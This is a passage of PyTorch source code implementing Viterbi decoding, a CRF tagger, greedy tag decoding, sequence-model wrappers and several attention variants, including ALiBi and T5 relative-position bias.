    """Viterbi decode wrapper for a batch of exactly one, delegating to `script_viterbi`"""

    def __init__(self, start_idx: int, end_idx: int):
        """
        :param start_idx: The index of the start (GO) tag
        :param end_idx: The index of the end (EOS) tag
        """
        super().__init__()
        self.start_idx = start_idx
        self.end_idx = end_idx

    def forward(self, unary: torch.Tensor, trans: torch.Tensor, _: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Decode a single-example batch.

        :param unary: Unary scores `[T, 1, N]`
        :param trans: Transition scores `[1, N, N]`
        :param _: Unused lengths tensor
        :return: The best path `[T, 1]` and its score
        """
        best_path, path_score = script_viterbi(unary.squeeze(1), trans.squeeze(0), self.start_idx, self.end_idx)
        return best_path.unsqueeze(1), path_score
class Viterbi(nn.Module):
    """Batched Viterbi decoder as an `nn.Module`.
    Runs the forward max-product pass over time while recording backpointers,
    then traces the best path backwards for every sequence in the padded batch.
    """
    def __init__(self, start_idx: int, end_idx: int):
        """
        :param start_idx: Index of the start (GO) tag
        :param end_idx: Index of the end (EOS) tag
        """
        super().__init__()
        self.start_idx = start_idx
        self.end_idx = end_idx
    # r, start_idx: int, end_idx: int, norm = lambda x, y: x
    def forward(
        self, unary: torch.Tensor, trans: torch.Tensor, lengths: torch.Tensor
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        """Do Viterbi decode on a batch.
        :param unary: torch.FloatTensor: [T, B, N]
        :param trans: torch.FloatTensor: [1, N, N]
        :param lengths: torch.LongTensor: [B], the true (unpadded) sequence lengths
        :return: torch.LongTensor: [T, B] the padded paths
        :return: torch.FloatTensor: [B] the path scores
        """
        seq_len, batch_size, tag_size = unary.size()
        min_length = torch.min(lengths)
        backpointers = []
        # Alphas: [B, 1, N]
        alphas = torch.full((batch_size, 1, tag_size), -1e4, device=unary.device)
        alphas[:, 0, self.start_idx] = 0
        # alphas = self.norm(alphas)
        for i, unary_t in enumerate(unary):
            # [B, 1, N] + [1, N, N] -> [B, N, N]; max over dim 2 picks the best "from" tag
            next_tag_var = alphas + trans
            viterbi, best_tag_ids = torch.max(next_tag_var, 2)
            backpointers.append(best_tag_ids)
            new_alphas = viterbi + unary_t
            new_alphas.unsqueeze_(1)
            # This part generates a warning
            # Once past the shortest sequence, only rows still inside their true
            # length take the new alphas; finished rows keep their old alphas
            # (the two masked_fills select old vs. new per batch row).
            if i >= min_length:
                mask = (i < lengths).view(-1, 1, 1)
                alphas = alphas.masked_fill(mask, 0) + new_alphas.masked_fill(mask == MASK_FALSE, 0)
            else:
                alphas = new_alphas
        # Add end tag
        terminal_var = alphas.squeeze(1) + trans[:, self.end_idx, :]
        path_score, best_tag_id = torch.max(terminal_var, 1)
        # Flip lengths: index of each sequence's last real step, counted from the end
        rev_len = seq_len - lengths - 1
        best_path = [best_tag_id]
        for i in range(len(backpointers)):
            t = len(backpointers) - i - 1
            backpointer_t = backpointers[t]
            # Get new best tag candidate
            new_best_tag_id = backpointer_t.gather(1, best_tag_id.unsqueeze(1)).squeeze(1)
            # We are going backwards now; until the flipped length is passed,
            # a row is still in its padded region and its tag is held at 0
            mask = i > rev_len
            best_tag_id = best_tag_id.masked_fill(mask, 0) + new_best_tag_id.masked_fill(mask == MASK_FALSE, 0)
            best_path.append(best_tag_id)
        _ = best_path.pop()
        best_path.reverse()
        best_path = torch.stack(best_path)
        # Mask out the extra tags (This might be pointless given that anything that
        # will use this as a dense tensor downstream will mask it itself?)
        seq_mask = sequence_mask(lengths, seq_len).to(best_path.device).transpose(0, 1)
        best_path = best_path.masked_fill(seq_mask == MASK_FALSE, 0)
        return best_path, path_score
@torch.jit.script
def script_viterbi_log_softmax_norm(
    unary: torch.Tensor, trans: torch.Tensor, start_idx: int, end_idx: int
) -> Tuple[torch.Tensor, torch.Tensor]:
    """Single-sequence Viterbi decode (TorchScript) with the initial alphas
    normalized via log-softmax; otherwise identical to `script_viterbi`.
    :param unary: Emission scores `[T, N]`
    :param trans: Transition scores `[N, N]`, indexed `trans[to_tag, from_tag]`
    :param start_idx: Index of the start (GO) tag
    :param end_idx: Index of the end (EOS) tag
    :return: A tuple of (best path `[T]`, score of that path)
    """
    seq_len: int = unary.size(0)
    num_tags: int = unary.size(1)
    fill_value: float = -1e4
    # dtype=unary.dtype fails, with prim_dtype error on torch 1.7.1
    alphas = torch.full((num_tags,), fill_value, dtype=torch.float, device=unary.device)
    # Scatter 0 into position `start_idx`: only the GO tag is viable initially
    broadcast_idx = torch.full((num_tags,), start_idx, dtype=torch.long)
    alphas = alphas.scatter(0, broadcast_idx, torch.zeros((num_tags,)))
    alphas = alphas.unsqueeze(0)
    # Normalize the starting distribution in log space
    alphas = torch.log(F.softmax(alphas, dim=-1))
    # Dummy first row lets backpointers grow via torch.cat; hence `t + 1` below
    backpointers: torch.Tensor = torch.zeros(num_tags, dtype=torch.long).unsqueeze(0)
    for i in range(seq_len):
        unary_t = unary[i, :]
        next_tag_var = alphas + trans
        viterbi, best_tag_ids = torch.max(next_tag_var, 1)
        backpointers = torch.cat([backpointers, best_tag_ids.unsqueeze(0)], 0)
        alphas = (viterbi + unary_t).unsqueeze(0)
    # Transition into the terminal (EOS) tag
    terminal_vars = alphas.squeeze(0) + trans[end_idx, :]
    path_score, best_tag_id = torch.max(terminal_vars, 0)
    best_path = best_tag_id.unsqueeze(0)
    # Trace the backpointers from the last timestep back to the first
    for i in range(unary.size(0)):
        t = seq_len - i - 1
        best_tag_id = backpointers[t + 1, best_tag_id]
        best_path = torch.cat([best_path, best_tag_id.unsqueeze(0)], -1)
    # Reverse into forward order and drop the leading start-of-sequence entry
    new_path_vec = best_path.flip(0)
    return new_path_vec[1:], path_score
class ViterbiLogSoftmaxNormBatchSize1(nn.Module):
    """Log-softmax-normalized Viterbi decoder for a batch of exactly one.

    Drops the singleton batch dimension, delegates to the scripted
    single-sequence decoder, and re-adds the batch dimension afterwards.
    """

    def __init__(self, start_idx: int, end_idx: int):
        super().__init__()
        self.start_idx = start_idx
        self.end_idx = end_idx

    def forward(self, unary: torch.Tensor, trans: torch.Tensor, _: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        # unary: [T, 1, N] -> [T, N]; trans: [1, N, N] -> [N, N]
        single_unary = unary.squeeze(1)
        single_trans = trans.squeeze(0)
        best_path, best_score = script_viterbi_log_softmax_norm(single_unary, single_trans, self.start_idx, self.end_idx)
        return best_path.unsqueeze(1), best_score
class ViterbiLogSoftmaxNorm(Viterbi):
    """Batched Viterbi decoder that log-softmax normalizes the initial alphas.
    Identical to `Viterbi.forward` apart from the normalization applied right
    after initialization.
    """
    def forward(
        self, unary: torch.Tensor, trans: torch.Tensor, lengths: torch.Tensor
    ) -> Tuple[torch.Tensor, torch.Tensor]:
        """Do Viterbi decode on a batch.
        :param unary: torch.FloatTensor: [T, B, N]
        :param trans: torch.FloatTensor: [1, N, N]
        :param lengths: torch.LongTensor: [B], the true (unpadded) sequence lengths
        :return: torch.LongTensor: [T, B] the padded paths
        :return: torch.FloatTensor: [B] the path scores
        """
        seq_len, batch_size, tag_size = unary.size()
        min_length = torch.min(lengths)
        backpointers = []
        # Alphas: [B, 1, N]
        alphas = torch.full((batch_size, 1, tag_size), -1e4, device=unary.device)
        alphas[:, 0, self.start_idx] = 0
        # Normalize the starting scores in log space
        alphas = F.log_softmax(alphas, dim=-1)
        for i, unary_t in enumerate(unary):
            # [B, 1, N] + [1, N, N] -> [B, N, N]; max over dim 2 picks the best "from" tag
            next_tag_var = alphas + trans
            viterbi, best_tag_ids = torch.max(next_tag_var, 2)
            backpointers.append(best_tag_ids)
            new_alphas = viterbi + unary_t
            new_alphas.unsqueeze_(1)
            # Once past the shortest sequence, only rows still inside their true
            # length take the new alphas; finished rows keep their old alphas
            if i >= min_length:
                mask = (i < lengths).view(-1, 1, 1)
                alphas = alphas.masked_fill(mask, 0) + new_alphas.masked_fill(mask == MASK_FALSE, 0)
            else:
                alphas = new_alphas
        # Add end tag
        terminal_var = alphas.squeeze(1) + trans[:, self.end_idx, :]
        path_score, best_tag_id = torch.max(terminal_var, 1)
        # Flip lengths: index of each sequence's last real step, counted from the end
        rev_len = seq_len - lengths - 1
        best_path = [best_tag_id]
        for i in range(len(backpointers)):
            t = len(backpointers) - i - 1
            backpointer_t = backpointers[t]
            # Get new best tag candidate
            new_best_tag_id = backpointer_t.gather(1, best_tag_id.unsqueeze(1)).squeeze(1)
            # We are going backwards now; until the flipped length is passed,
            # a row is still in its padded region and its tag is held at 0
            mask = i > rev_len
            best_tag_id = best_tag_id.masked_fill(mask, 0) + new_best_tag_id.masked_fill(mask == MASK_FALSE, 0)
            best_path.append(best_tag_id)
        _ = best_path.pop()
        best_path.reverse()
        best_path = torch.stack(best_path)
        # Mask out the extra tags (This might be pointless given that anything that
        # will use this as a dense tensor downstream will mask it itself?)
        seq_mask = sequence_mask(lengths, seq_len).to(best_path.device).transpose(0, 1)
        best_path = best_path.masked_fill(seq_mask == MASK_FALSE, 0)
        return best_path, path_score
def ident(x):
    """Identity function: return *x* unchanged."""
    return x
class TaggerGreedyDecoder(nn.Module):
    def __init__(
        self,
        num_tags: int,
        constraint_mask: Optional[torch.Tensor] = None,
        batch_first: bool = True,
        reduction: str = "batch",
    ):
        """A Greedy decoder and loss module for taggers.
        :param num_tags: `int` The number of output classes
        :param constraint_mask: `Tensor[1, N, N]` A mask with valid transitions as 1 and invalid as 0
        :param batch_first: `bool` Should the batch dimensions be first?
        :param reduction: `str` Should the loss be calculated at the token level or batch level
        """
        super().__init__()
        self.num_tags = num_tags
        if constraint_mask is not None:
            # Convert the byte mask into log-space transition scores: positions
            # where the mask is truthy get a -1e4 penalty before log-softmax.
            # NOTE(review): masked_fill penalizes mask==1 positions, which seems
            # to contradict "valid transitions as 1" above -- confirm polarity.
            constraint_mask = F.log_softmax(
                torch.zeros(constraint_mask.shape).masked_fill(constraint_mask, -1e4), dim=1
            )
            self.register_buffer("constraint_mask", constraint_mask)
        else:
            self.constraint_mask = None
        # FIXME: we cant do it like this if using TorchScript
        # Pick the layout converters once based on the input layout
        self.to_batch_first = ident if batch_first else tbh2bth
        self.to_time_first = bth2tbh if batch_first else ident
        self.batch_first = batch_first
        self.loss = SequenceLoss(LossFn=nn.CrossEntropyLoss, avg=reduction)
        self.viterbi = ViterbiLogSoftmaxNorm(Offsets.GO, Offsets.EOS)
    @property
    def transitions(self):
        # The (log-softmaxed) constrained transition scores, or None when unconstrained
        return self.constraint_mask
    def neg_log_loss(self, inputs, tags, lengths):
        """Cross-entropy loss over the unaries.
        NOTE(review): `lengths` is accepted but unused here -- presumably the
        underlying SequenceLoss handles padding itself; confirm.
        """
        unaries = self.to_batch_first(inputs)
        tags = self.to_batch_first(tags)
        return self.loss(unaries, tags)
    def forward(self, inputs) -> torch.Tensor:
        unaries, lengths = tensor_and_lengths(inputs)
        # If there is a constraint mask do a masked viterbi
        if self.constraint_mask is not None:
            probv = self.to_time_first(unaries)
            probv = F.log_softmax(probv, dim=-1)
            preds, scores = self.viterbi(probv, self.constraint_mask, lengths)
            if self.batch_first:
                return tbh2bth(preds)  # , scores
            else:
                return preds
        else:
            # Decoding doesn't care about batch/time first
            _, preds = torch.max(unaries, -1)
            mask = sequence_mask(lengths, unaries.shape[1]).to(preds.device)
            # The mask gets generated as batch first
            mask = mask if self.batch_first else mask.transpose(0, 1)
            # Zero out predictions in the padded region
            preds = preds.masked_fill(mask == MASK_FALSE, 0)
        return preds  # , None
    def extra_repr(self) -> str:
        str_ = f"n_tags={self.num_tags}, batch_first={self.batch_first}"
        if self.constraint_mask is not None:
            str_ += ", constrained=True"
        return str_
class CRF(nn.Module):
    def __init__(
        self,
        num_tags: int,
        constraint_mask: Optional[torch.Tensor] = None,
        batch_first: bool = True,
        idxs: Tuple[int, int] = (Offsets.GO, Offsets.EOS),
    ):
        """Initialize the object.

        :param num_tags: int, The number of tags in your output (emission size)
        :param constraint_mask: torch.ByteTensor, Constraints on the transitions [1, N, N]
        :param idxs: Tuple(int. int), The index of the start and stop symbol
            in emissions.
        :param batch_first: bool, if the input [B, T, ...] or [T, B, ...]

        Note:
            if idxs is none then the CRF adds these symbols to the emission
            vectors and n_tags is assumed to be the number of output tags.
            if idxs is not none then the first element is assumed to be the
            start index and the second idx is assumed to be the end index. In
            this case n_tags is assumed to include the start and end symbols.
        """
        super().__init__()
        self.start_idx, self.end_idx = idxs
        self.num_tags = num_tags
        if constraint_mask is not None:
            self.register_buffer("constraint_mask", constraint_mask)
        else:
            self.constraint_mask = None
        # Learned transition scores [1, N, N], zero-initialized
        self.transitions_p = nn.Parameter(torch.Tensor(1, self.num_tags, self.num_tags).zero_())
        self.batch_first = batch_first
        self.viterbi = Viterbi(self.start_idx, self.end_idx)

    def extra_repr(self) -> str:
        str_ = "n_tags=%d, batch_first=%s" % (self.num_tags, self.batch_first)
        if self.constraint_mask is not None:
            str_ += ", constrained=True"
        return str_

    @property
    def transitions(self):
        """Transition scores, with invalid transitions pushed to -1e4 when constrained."""
        if self.constraint_mask is not None:
            return self.transitions_p.masked_fill(self.constraint_mask, -1e4)
        return self.transitions_p

    def neg_log_loss(self, unary, tags, lengths):
        """Neg Log Loss with a Batched CRF.

        :param unary: torch.FloatTensor: [T, B, N] or [B, T, N]
        :param tags: torch.LongTensor: [T, B] or [B, T]
        :param lengths: torch.LongTensor: [B]
        :return: torch.FloatTensor: scalar, the mean loss over the batch
        """
        # Convert from [B, T, N] -> [T, B, N]
        if self.batch_first:
            unary = unary.transpose(0, 1)
            tags = tags.transpose(0, 1)
        _, batch_size, _ = unary.size()
        fwd_score = self._forward_alg(unary, lengths)
        gold_score = self.score_sentence(unary, tags, lengths)
        # NLL = log Z - score(gold path)
        loss = fwd_score - gold_score
        batch_loss = torch.mean(loss)
        return batch_loss

    def score_sentence(self, unary: torch.Tensor, tags: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
        """Score a batch of sentences.

        :param unary: torch.FloatTensor: [T, B, N]
        :param tags: torch.LongTensor: [T, B]
        :param lengths: torch.LongTensor: [B]
        :return: torch.FloatTensor: [B]
        """
        batch_size = lengths.shape[0]
        assert lengths.shape[0] == unary.shape[1]
        trans = self.transitions.squeeze(0)  # [N, N]
        # Prepend the GO tag so every real tag has a predecessor
        start = torch.full((1, batch_size), self.start_idx, dtype=tags.dtype, device=tags.device)  # [1, B]
        tags = torch.cat([start, tags], 0)  # [T + 1, B]
        # Unfold gives me all slices of size 2 (this tag next tag) from dimension T
        tag_pairs = tags.unfold(0, 2, 1)
        # Move the pair dim to the front and split it into two
        indices = tag_pairs.permute(2, 0, 1).chunk(2)
        # trans is indexed [to, from]
        trans_score = trans[[indices[1], indices[0]]].squeeze(0)
        # Pull out the values of the tags from the unary scores.
        unary_score = unary.gather(2, tags[1:].unsqueeze(-1)).squeeze(-1)
        mask = sequence_mask(lengths).transpose(0, 1).to(tags.device)
        scores = unary_score + trans_score
        # Zero out contributions from the padded region before summing over time
        scores = scores.masked_fill(mask == MASK_FALSE, 0)
        scores = scores.sum(0)
        # Add the transition from each sequence's final real tag into EOS
        eos_scores = trans[self.end_idx, tags.gather(0, lengths.unsqueeze(0)).squeeze(0)]
        scores = scores + eos_scores
        return scores

    def _forward_alg(self, unary: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
        """For CRF forward on a batch.

        :param unary: torch.FloatTensor: [T, B, N]
        :param lengths: torch.LongTensor: [B]
        :return: torch.FloatTensor: [B], the log partition function per sequence
        """
        # alphas: [B, 1, N]
        min_length = torch.min(lengths)
        batch_size = lengths.shape[0]
        # Fix: this was a bare `lengths.shape[0] == unary.shape[1]` comparison
        # whose result was discarded, so it checked nothing. Make it an assert,
        # matching the equivalent check in score_sentence.
        assert lengths.shape[0] == unary.shape[1]
        alphas = torch.full((batch_size, 1, self.num_tags), -1e4, device=unary.device)
        alphas[:, 0, self.start_idx] = 0.0
        # alphas.requires_grad = True
        trans = self.transitions  # [1, N, N]
        for i, unary_t in enumerate(unary):
            # unary_t: [B, N]
            unary_t = unary_t.unsqueeze(2)  # [B, N, 1]
            # Broadcast alphas along the rows of trans
            # Broadcast trans along the batch of alphas
            # [B, 1, N] + [1, N, N] -> [B, N, N]
            # Broadcast unary_t along the cols of result
            # [B, N, N] + [B, N, 1] -> [B, N, N]
            scores = alphas + trans + unary_t
            new_alphas = vec_log_sum_exp(scores, 2).transpose(1, 2)
            # If we haven't reached your length zero out old alpha and take new one.
            # If we are past your length, zero out new_alpha and keep old one.
            if i >= min_length:
                mask = (i < lengths).view(-1, 1, 1)
                alphas = alphas.masked_fill(mask, 0) + new_alphas.masked_fill(mask == MASK_FALSE, 0)
            else:
                alphas = new_alphas
        # Fold in the transition into the terminal (EOS) tag, then log-sum-exp
        terminal_vars = alphas + trans[:, self.end_idx]
        alphas = vec_log_sum_exp(terminal_vars, 2)
        return alphas.view(batch_size)

    def forward(self, inputs: Tuple[torch.Tensor, torch.Tensor]) -> torch.Tensor:
        """Training mode: per-sequence log partition; eval mode: best tag paths."""
        unary, lengths = inputs
        if self.training:
            if self.batch_first:
                unary = unary.transpose(0, 1)
            forward = self._forward_alg(unary, lengths)
            # if self.batch_first:
            #    forward = forward.transpose(0, 1)
            return forward
        with torch.no_grad():
            return self.decode(unary, lengths)[0]

    @jit.export
    def decode(self, unary: torch.Tensor, lengths: torch.Tensor) -> Tuple[torch.Tensor, torch.Tensor]:
        """Do Viterbi decode on a batch.

        :param unary: torch.FloatTensor: [T, B, N] or [B, T, N]
        :param lengths: torch.LongTensor: [B]
        :return: torch.LongTensor: [B] the paths
        :return: torch.FloatTensor: [B] the path score
        """
        if self.batch_first:
            unary = unary.transpose(0, 1)
        trans = self.transitions  # [1, N, N]
        path, score = self.viterbi(unary, trans, lengths)
        if self.batch_first:
            path = path.transpose(0, 1)
        return path, score
class SequenceModel(nn.Module):
    """Generic (embed -> transduce -> project -> decode) sequence model skeleton."""
    def __init__(self, nc: int, embeddings: nn.Module, transducer: nn.Module, decoder: Optional[nn.Module] = None):
        """
        :param nc: Number of output classes
        :param embeddings: Module mapping the input dict to a dense representation
        :param transducer: Module mapping (embedded, lengths) to hidden states
        :param decoder: Optional decoder applied to the projected output
        """
        super().__init__()
        self.embed_model = embeddings
        self.transducer_model = transducer
        # TODO: make this a separate model!
        # Project down to the class space only when the sizes differ;
        # otherwise pass the transducer output through unchanged
        if transducer.output_dim != nc:
            self.proj_layer = Dense(transducer.output_dim, nc)
        else:
            self.proj_layer = nn.Identity()
        self.decoder_model = decoder
    def transduce(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
        """Embed and transduce the input batch, projecting to the class space."""
        lengths = inputs["lengths"]
        embedded = self.embed_model(inputs)
        embedded = (embedded, lengths)
        # transduced = self.transducer_model(embedded)
        transduced = self.proj_layer(self.transducer_model(embedded))
        return transduced
    def decode(self, transduced: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
        """Run the decoder over the transduced output."""
        return self.decoder_model((transduced, lengths))
    def forward(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
        # NOTE(review): stub -- as written this returns None; subclasses are
        # expected to override (see TagSequenceModel).
        pass
class TagSequenceModel(SequenceModel):
    """Sequence tagging model whose default decoder is a batch-first CRF."""

    def __init__(self, nc: int, embeddings: nn.Module, transducer: nn.Module, decoder: Optional[nn.Module] = None):
        if decoder is None:
            decoder_model = CRF(nc, batch_first=True)
        else:
            decoder_model = decoder
        super().__init__(nc, embeddings, transducer, decoder_model)

    def neg_log_loss(self, unary: torch.Tensor, tags: torch.Tensor, lengths: torch.Tensor) -> torch.Tensor:
        """Delegate the negative log-likelihood computation to the decoder."""
        return self.decoder_model.neg_log_loss(unary, tags, lengths)

    def forward(self, inputs: Dict[str, torch.Tensor]) -> torch.Tensor:
        """Embed, transduce and decode a batch, returning the best tag paths."""
        transduced_output = self.transduce(inputs)
        return self.decode(transduced_output, inputs["lengths"])
class LangSequenceModel(nn.Module):
    """Language-model wrapper: embed -> transduce (optionally stateful) -> project to classes.
    The call path (with or without hidden state) is selected once at
    construction time based on the transducer's `requires_state` attribute.
    """
    def __init__(
        self,
        nc: int,
        embeddings: nn.Module,
        transducer: nn.Module,
        decoder: Optional[nn.Module] = None,
        name: Optional[str] = None,
    ):
        """
        :param nc: Number of output classes (e.g. vocabulary size)
        :param embeddings: Module mapping the input dict to a dense representation
        :param transducer: Module producing hidden states (may consume/emit state)
        :param decoder: Optional decoder module (stored but not used in this class)
        :param name: Optional model name (not used in this class)
        """
        super().__init__()
        self.embed_model = embeddings
        self.transducer_model = transducer
        # Choose the call path once, depending on whether the transducer
        # threads recurrent hidden state through the forward pass
        if hasattr(transducer, "requires_state") and transducer.requires_state:
            self._call = self._call_with_state
            self.requires_state = True
        else:
            self._call = self._call_without_state
            self.requires_state = False
        self.output_layer = nn.Linear(self.transducer_model.output_dim, nc)
        self.decoder_model = decoder
    def forward(self, inputs: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
        """Return (output scores, new hidden state or None)."""
        return self._call(inputs)
    def _call_with_state(self, inputs: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
        # Incoming hidden state is expected under the "h" key
        h = inputs["h"]
        embedded = self.embed_model(inputs)
        transduced, hidden = self.transducer_model((embedded, h))
        transduced = self.output_layer(transduced)
        return transduced, hidden
    def _call_without_state(self, inputs: Dict[str, torch.Tensor]) -> Tuple[torch.Tensor, Optional[torch.Tensor]]:
        embedded = self.embed_model(inputs)
        transduced = self.transducer_model((embedded, None))
        transduced = self.output_layer(transduced)
        return transduced, None
def pytorch_embedding(weights: torch.Tensor, finetune: bool = True) -> nn.Embedding:
    """Creation function for making an nn.Embedding with the given weights

    :param weights: The weights to use
    :param finetune: Should we fine-tune the embeddings or freeze them
    """
    vsz, dsz = weights.shape
    lut = nn.Embedding(vsz, dsz, padding_idx=Offsets.PAD)
    # Replace the randomly initialized weight with the provided table; the
    # requires_grad flag controls whether it is fine-tuned or frozen
    del lut.weight
    lut.weight = nn.Parameter(torch.FloatTensor(weights), requires_grad=finetune)
    return lut
def subsequent_mask(size: int):
    """
    Creates a lower triangular mask to mask future

    :param size: Temporal length
    :return: A tensor of type `uint8` that is 1s along diagonals and below, zero o.w
    """
    ones = np.ones((1, 1, size, size))
    lower_tri = np.tril(ones).astype("uint8")
    return torch.from_numpy(lower_tri)
class SequenceSequenceAttention(nn.Module):
    """Base class for attention over a (query, key, value, mask) tuple.

    Subclasses implement `_attention` to produce normalized weights; this class
    handles dropout, caching the weights on `self.attn`, and applying the
    weights to the values.
    """

    def __init__(self, hsz: int = None, pdrop: float = 0.1, **kwargs):
        super().__init__()
        self.hsz = hsz
        self.dropout = nn.Dropout(pdrop)
        # Most recent (pre-dropout) attention weights, kept for inspection
        self.attn = None

    def forward(self, qkvm: Tuple[torch.Tensor, torch.Tensor, torch.Tensor, torch.Tensor]) -> torch.Tensor:
        query, key, value, mask = qkvm
        weights = self._attention(query, key, mask)
        self.attn = weights
        weights = self.dropout(weights)
        return self._update(weights, value)

    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        # Abstract: subclasses compute the normalized attention weights here
        pass

    def _update(self, a: torch.Tensor, value: torch.Tensor) -> torch.Tensor:
        """Apply the attention weights to the values with a single matmul.

        :param a: The attention weights [B, H, T_q, T_k]
        :param value: The values [B, H, T_k, D]
        :returns: A tensor of shape [B, H, T_q, D]
        """
        return torch.matmul(a, value)
class SeqScaledDotProductAttention(SequenceSequenceAttention):
    """Scaled dot-product attention from https://arxiv.org/abs/1706.03762."""

    def __init__(self, pdrop: float = 0.1, **kwargs):
        super().__init__(pdrop=pdrop, **kwargs)

    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        """Compute softmax(QK^T / sqrt(d_k)), optionally masking forbidden positions.

        :param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
        :param key: a set of keys from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :return: A tensor that is (BxHxTxT)
        """
        dim_per_head = query.size(-1)
        # (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
        logits = torch.matmul(query, key.transpose(-2, -1))
        logits = logits / math.sqrt(dim_per_head)
        if mask is not None:
            # [B, 1, 1, T_k] broadcasts over [B, H, T_q, T_k]
            logits = logits.masked_fill(mask == MASK_FALSE, -1e9)
        return F.softmax(logits, dim=-1)
class SeqScaledDotProductAttentionALiBi(SequenceSequenceAttention):
    """Scaled dot-product attention with ALiBi (Attention with Linear Biases) position biasing."""
    def __init__(self, pdrop: float = 0.1, num_heads=None, **kwargs):
        """
        :param pdrop: Dropout probability applied to the attention weights
        :param num_heads: Number of attention heads (one ALiBi slope per head)
        """
        super().__init__(pdrop=pdrop, **kwargs)
        self.num_heads = num_heads
        # One fixed (non-learned) slope per head; registered as a buffer so it
        # follows the module across devices
        slopes = torch.tensor(get_alibi_slopes(self.num_heads))
        self.register_buffer("slopes", slopes)
    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        """Attention with Linear Biases, defined in https://arxiv.org/pdf/2108.12409.pdf
        :param query: a query for alignment. Can come from self in case of self-attn or decoder in case of E/D
        :param key: a set of keys from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :return: A tensor that is (BxHxTxT)
        """
        # (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
        d_k = query.size(-1)
        scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
        T_k = scores.shape[-1]
        T_q = scores.shape[-2]
        # Bias is the negative distance between positions, scaled per head
        offsets = - torch.abs(torch.arange(T_q).view(-1, 1) - torch.arange(T_k).view(1, -1)).to(self.slopes.device)  # [T_q, T_k]
        alibi = self.slopes.unsqueeze(-1).unsqueeze(-1) * offsets.unsqueeze(0)  # [H, T_q, T_k]
        alibi = alibi.unsqueeze(0)  # [1, H, T_q, T_k]
        scores += alibi
        if mask is not None:
            scores = scores.masked_fill(mask == MASK_FALSE, -1e9)  # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
        return F.softmax(scores, dim=-1)
class SeqScaledDotProductAttentionT5(SequenceSequenceAttention):
    """Scaled dot-product attention with T5-style learned relative position biases."""
    def __init__(self, pdrop: float = 0.1, num_heads=None, bidirectional=True, num_buckets=32, max_distance=128, **kwargs):
        """
        :param pdrop: Dropout probability applied to the attention weights
        :param num_heads: Number of attention heads
        :param bidirectional: If True, bucket forward and backward offsets separately
        :param num_buckets: Number of relative-position buckets
        :param max_distance: Offsets beyond this distance share the final buckets
        """
        super().__init__(pdrop=pdrop, **kwargs)
        self.num_heads = num_heads
        self.bidirectional = bidirectional
        self.num_buckets = num_buckets
        self.max_distance = max_distance
        # Learned per-head bias for each relative-position bucket
        rel_embedding = torch.nn.init.kaiming_normal_(torch.empty((self.num_heads, self.num_buckets),
                                                                  dtype=torch.float), nonlinearity='linear')
        self.rel_embedding = nn.Parameter(rel_embedding, requires_grad=True)
    def _relative_position_bucket(self, relative_position):
        """Taken from https://github.com/tensorflow/mesh/blob/bbb6ce7917e2a8ef1f3dc6990fcacd4f3b075acd/mesh_tensorflow/transformer/transformer_layers.py#L1014
        Map signed relative offsets to bucket ids: small offsets get exact
        buckets, larger ones are bucketed logarithmically up to `max_distance`.
        """
        ret = 0
        n = -relative_position
        num_buckets = self.num_buckets
        if self.bidirectional:
            # Split the buckets between negative and positive offsets
            num_buckets //= 2
            ret += torch.lt(n, 0).to(dtype=torch.long) * num_buckets
            n = torch.abs(n).to(dtype=torch.long)
        else:
            n = torch.maximum(n, 0).to(dtype=torch.long)
        # now n is in the range [0, inf)
        max_exact = num_buckets // 2
        is_small = torch.lt(n, max_exact)
        # Log-spaced buckets for larger offsets, capped at the last bucket
        val_if_large = max_exact + (
            torch.log(n.to(dtype=torch.float32) / max_exact)
            / math.log(self.max_distance / max_exact) * (num_buckets - max_exact)).to(dtype=torch.long)
        val_if_large = torch.minimum(val_if_large, torch.tensor(num_buckets - 1))
        ret += torch.where(is_small, n, val_if_large)
        return ret
    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        """Relative Attention described in https://arxiv.org/abs/1910.10683
        :param query: a query for alignment.
        :param key: a set of keys from encoder or self
        :param mask: masking (for destination) to prevent seeing what we shouldnt
        :return: A tensor that is (BxHxTxT)
        """
        # (., H, T_q, T_k) = (., H, T_q, D) x (., H, D, T_k)
        d_k = query.size(-1)
        scores = torch.matmul(query, key.transpose(-2, -1)) / math.sqrt(d_k)
        T_k = scores.shape[-1]
        T_q = scores.shape[-2]
        # Signed offset between each query position and each key position
        memory_position = torch.arange(T_k).view(1, -1)
        query_position = torch.arange(T_q).view(-1, 1)
        relative_position = memory_position - query_position
        rp_bucket = self._relative_position_bucket(relative_position)
        # Look up the per-head bias for each bucket: [H, T_q, T_k]
        relative_attention_bias = self.rel_embedding[:, rp_bucket]
        scores += relative_attention_bias
        if mask is not None:
            scores = scores.masked_fill(mask == MASK_FALSE, -1e9)  # [B, 1, 1, T_k] broadcast to [B, 1, T_q, T_k]
        return F.softmax(scores, dim=-1)
class SeqDotProductAttention(SequenceSequenceAttention):
    """Unscaled dot-product attention: softmax(QK^T), optionally masked."""

    def __init__(self, pdrop: float = 0.1, **kwargs):
        super().__init__(pdrop=pdrop, **kwargs)

    def _attention(self, query: torch.Tensor, key: torch.Tensor, mask: Optional[torch.Tensor] = None) -> torch.Tensor:
        # [B, H, T_q, D] x [B, H, D, T_k] -> [B, H, T_q, T_k]
